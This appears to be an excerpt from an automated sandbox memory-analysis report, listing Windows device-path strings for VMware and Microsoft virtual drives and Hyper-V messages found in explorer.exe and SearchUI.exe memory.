Source: explorer.exe, 00000007.00000003.445284088.000000000D02D000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Public
Source: explorer.exe, 00000004.00000000.248428809.000000000F734000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&K
Source: explorer.exe, 00000004.00000000.248428809.000000000F734000.00000004.00000001.sdmpBinary or memory string: 6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000003.358711449.000000000D1FF000.00000004.00000001.sdmpBinary or memory string: STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_VirB
Source: explorer.exe, 00000007.00000003.309158574.0000000008741000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
Source: explorer.exe, 00000007.00000003.362429381.000000000D030000.00000004.00000001.sdmpBinary or memory string: 0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f$
Source: explorer.exe, 00000007.00000003.361755832.000000000D080000.00000004.00000001.sdmpBinary or memory string: \?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000003.324285365.000000000D0A0000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B]?2
Source: explorer.exe, 00000007.00000003.445284088.000000000D02D000.00000004.00000001.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&{
Source: explorer.exe, 00000007.00000003.335462967.000000000D09F000.00000004.00000001.sdmpBinary or memory string: _VMware_SATAy>V
Source: explorer.exe, 00000007.00000003.322302501.000000000D0A0000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bk1H
Source: explorer.exe, 00000004.00000000.232968132.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000004.00000000.244442266.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: explorer.exe, 00000004.00000000.244692343.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
Source: explorer.exe, 00000007.00000003.446576781.000000000D02F000.00000004.00000001.sdmpBinary or memory string: c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}png11SPS
Source: explorer.exe, 00000007.00000003.358711449.000000000D1FF000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000007.00000003.312934031.000000000D00B000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000007.00000003.312934031.000000000D00B000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}f
Source: explorer.exe, 00000007.00000003.312934031.000000000D00B000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}g
Source: explorer.exe, 00000007.00000003.420451429.000000000D19A000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Extras
Source: explorer.exe, 00000007.00000003.395167657.000000000D07F000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}h
Source: explorer.exe, 00000007.00000003.442433219.000000000D02D000.00000004.00000001.sdmpBinary or memory string: c6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000007.00000003.358711449.000000000D1FF000.00000004.00000001.sdmpBinary or memory string: e-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B^
Source: explorer.exe, 00000007.00000003.328147158.000000000D027000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f$
Source: explorer.exe, 00000004.00000000.241740682.0000000008220000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.384082578.000001D3CFC00000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: explorer.exe, 00000007.00000003.328806983.000000000D1ED000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B@
Source: explorer.exe, 00000007.00000003.304293863.00000000086A4000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000!]
Source: SearchUI.exe, 00000010.00000002.389452659.000001D3D01E4000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW(( H
Source: explorer.exe, 00000007.00000003.328806983.000000000D1ED000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}3
Source: explorer.exe, 00000007.00000003.358711449.000000000D1FF000.00000004.00000001.sdmpBinary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI&
Source: explorer.exe, 00000007.00000003.304293863.00000000086A4000.00000004.00000001.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00
Source: explorer.exe, 00000004.00000000.241740682.0000000008220000.00000002.00000001.sdmp, SearchUI.exe, 00000010.00000002.384082578.000001D3CFC00000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000007.00000003.420451429.000000000D19A000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}S*4Extras
Source: explorer.exe, 00000007.00000003.445938262.000000000D0C2000.00000004.00000001.sdmpBinary or memory string: 0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000007.00000003.322302501.000000000D0A0000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B6?
Source: explorer.exe, 00000007.00000003.394797344.000000000D138000.00000004.00000001.sdmpBinary or memory string: 6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x
Source: explorer.exe, 00000007.00000003.394797344.000000000D138000.00000004.00000001.sdmpBinary or memory string: f-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000007.00000003.304293863.00000000086A4000.00000004.00000001.sdmpBinary or memory string: NECVMWarVMware SATA CD001.00BN
Source: explorer.exe, 00000007.00000003.358711449.000000000D1FF000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BK
Source: explorer.exe, 00000007.00000003.361935461.000000000D202000.00000004.00000001.sdmpBinary or memory string: 1efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000^
Source: explorer.exe, 00000007.00000003.420451429.000000000D19A000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000007.00000003.444138100.000000000D02D000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}png11SPS
Source: explorer.exe, 00000007.00000003.303770661.0000000008707000.00000004.00000001.sdmpBinary or memory string: k\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000007.00000003.361935461.000000000D202000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&
Source: explorer.exe, 00000004.00000000.233003562.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: explorer.exe, 00000007.00000003.395167657.000000000D07F000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}:
